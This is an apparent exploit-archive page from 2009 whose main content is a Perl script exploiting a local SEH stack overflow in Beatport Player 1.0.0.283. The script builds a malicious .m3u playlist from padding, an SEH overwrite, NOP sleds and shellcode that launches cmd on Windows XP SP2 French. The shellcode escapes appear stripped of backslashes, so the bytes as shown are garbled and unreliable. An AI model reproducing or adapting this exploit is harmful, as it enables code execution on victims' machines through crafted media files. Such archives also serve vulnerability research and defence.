Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #3

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #3
# Published : 2009-05-01
# Author : Stack
# Previous Title : Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #2
# Next Title : RM Downloader (.smi File) Universal Local Buffer Overflow Exploit

#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec -  EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"x8BxECx33xFFx57".
"xC6x45xFCx63xC6x45".
"xFDx6DxC6x45xFEx64".
"xC6x45xF8x01x8D".
"x45xFCx50xB8xC7x93".
"xBFx77xFFxD0";
my $junk = "x41" x 1232;
my $next_seh="xebx06x90x90";
my $seh  = "x44x25xD1x72"; #
my $nops = "x90" x 4;
my $nopsled = "x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
                    $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
                    "rn";
close $playlist;

# www.Syue.com [2009-05-01]